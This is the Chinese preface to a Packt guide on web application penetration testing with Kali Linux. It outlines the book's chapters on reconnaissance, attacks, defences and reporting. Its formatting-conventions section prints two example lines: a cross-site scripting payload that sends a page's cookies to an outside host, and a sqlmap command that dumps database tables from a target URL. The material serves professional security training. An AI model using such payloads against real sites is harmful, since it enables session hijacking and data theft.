前言

前言

Kali是专业安全人员及其他人员用来进行安全评估的渗透测试工具库,它基于Debian Linux。Kali提供了大量经过定制的工具集,用来找出和利用系统中的漏洞。本书会介绍于2013年3月13日发布的Kali Linux中的一些工具以及其他一些开源工具。

本书作为一本指南,专为那些希望将Kali引入Web应用渗透测试的专业人员写就。我们的目标是找出针对某项特定任务的最佳Kali工具,提供使用这些工具的细节知识,并基于专业实战经历举一些例子,说明可以获取哪些信息用于最终交付的报告。Kali包含各种各样的程序和工具。不过,本书着重介绍的是那些在本书出版时用于完成特定任务的杀手级工具。

本书各章是按现实中Web应用渗透测试的任务划分的。第1章从整体上介绍渗透测试的基本概念、专业服务策略、Kali Linux环境的背景知识,以及如何为本书介绍的内容配置Kali Linux。第2章~第6章介绍各种Web应用渗透测试的概念,包括一些配置和报告实例,用来说明我们介绍的内容能否帮你达成既定目标。

第7章介绍一些针对前面几章提到的易受攻击系统的补救措施。第8章介绍撰写报告的最佳实践,并提供一些范例,它们可作为撰写可执行水平报告的模板。本书这么组织的初衷,是希望能指引读者用Kali中包含的最好的工具来实践Web应用的渗透测试,并能为读者提供补救漏洞的步骤,说明如何专业地呈现抓取的数据。

本书内容

第1章“渗透测试概要及环境配置”介绍进行专业的渗透测试所需要的基础知识。内容包括渗透测试和其他服务之间的区别、方法论概要及其所针对的目标Web应用。这一章还将介绍配置本书示例要用的Kali Linux环境所需的步骤。

第2章“侦察”介绍收集目标信息的各种途径。内容集中在网上可以获取的主流免费工具,以及Kali Linux中Information Gathering分类下的工具。

第3章“服务器端攻击”主要介绍发现和利用Web服务器及Web应用中的漏洞。其中讲到的工具在Kali或其他开源工具套件中都能找到。

第4章“客户端攻击”主要介绍普通用户的主机系统。内容包括社会工程学、主机系统漏洞利用,以及密码攻击,这些都是保证主机系统安全最常用的方法。

第5章“身份认证攻击”主要分析用户和设备如何进行身份验证以访问Web服务。内容包括将管理身份认证会话的过程作为目标、在主机系统中存储数据,以及中间人攻击技术。这一章还会简要介绍SQL和跨站脚本攻击。

第6章“Web攻击”主要介绍如何欺骗Web服务器,以及通过漏洞利用工具(如浏览器漏洞利用、代理攻击和密码收集)对Web应用造成危害。这一章还将介绍使用拒绝服务攻击技术来中断服务的一些方法。

第7章“防御对策”介绍加固Web应用和Web服务器的一些最佳实践。内容包括安全基线、补丁管理、密码策略,以及如何防御前几章介绍的攻击方法。这一章还有一节集中介绍取证,因为正确地在受危害设备上进行调查以避免额外的负面作用也很重要。

第8章“渗透测试执行报告”介绍撰写专业的渗透测试后服务报告的一些最佳实践。内容包括为交付结果增值的方法概述,以及文档格式、用来撰写专业报告的文档模板等。

读者须知

读者应该对Web应用、网络基础知识以及渗透测试方法论有一些基本的了解。本书将会通过详尽的例子来介绍如何使用Kali Linux以及其他开源应用中提供的工具执行攻击。我们并不要求读者之前有使用BackTrack或类似程序的经验,有则更好。

构建实验环境和安装配置Kali Linux工具库的硬件要求会在第1章中介绍。

目标读者

本书面向专业的渗透测试人员,或期望最大程度使用Kali Linux来进行Web服务器或Web应用渗透测试的人员。如果你希望学习如何对Web应用进行渗透测试,并将发现的结果呈现给客户,那么本书正适合你。

排版约定

本书会用不同的格式区分不同的信息。下面通过例子逐一介绍。

正文中的代码这样表示:“举个例子,你可以将该配置文件称为My First Scan,或是其他你中意的名称。”

代码块这样表示:

<script>document.write("<img src='http://kali.drchaos.com/var/www/xss_
lab/lab_script.php?"+document.cookie+"'>")</script>

命令行输入和输出这样表示:

sqlmap -u http://www.drchaous.com/article.php?id=5 -T tablesnamehere -U test --dump

新术语关键词会用黑体。屏幕截图中的单词这样标记:“在我们点击了Execute按钮后,就收到了一个SQL注入。”

图像说明文字 这个图标表示警告或重要提醒。

图像说明文字 这个图标表示提示或技巧。

读者反馈

我们一贯欢迎读者的反馈意见。你可以告诉我们阅读此书的感受——喜欢哪些内容以及不喜欢哪些内容。这些反馈对于协助我们创作出真正对读者有所裨益的内容至关重要。

你可以将一般反馈以电子邮件形式发送到feedback@packtpub.com,并在邮件标题中注明书名。

如果你在某一方向很有造诣,并且愿意著书或参与合著,可以参考我们的作者指南:www.packtpub.com/authors

客户支持

现在你已是Packt图书的尊贵读者了,为了让你的付出得到最大回报,我们还为你提供了其他许多方面的服务,请注意以下信息。

勘误

虽然我们会尽力保证内容的准确性,但错误在所难免。如果你在书中发现任何文字或代码错误,非常欢迎你将这些错误提交给我们,这样可以帮助我们在后续版本中改正错误,避免其他读者产生不必要的误解。如果你发现了错误,请访问http://www.packtpub.com/submit-errata,选择相应图书,点击errata submission form(提交勘误)链接,然后填写具体的错误信息即可。只要你提交的勘误经过确认,勘误信息就会上传到我们的网站,或是添加到已有勘误列表中,显示在该书的勘误页面上1。你可以通过在http://www.packtpub.com/support选择书名来查看该书所有已有勘误。

1要查阅或提交本书中文版勘误请访问http://www.ituring.com.cn/book/1347。——编者注

盗版

对所有媒体来说,网络盗版都是一个严峻的问题。Packt很重视版权保护。如果你在网上发现我们公司出版物的任何非法复制品,请及时告知我们相关网址或网站名称,以便我们采取补救措施。

举报请发送电子邮件至copyright@packtpub.com,并附上到可疑盗版材料的链接。

非常感谢你帮助我们保护作者权益,提供有价值内容。

问题

如果你有针对本书任何方面的问题,可以通过questions@packtpub.com联系我们,我们会尽力解决。

目录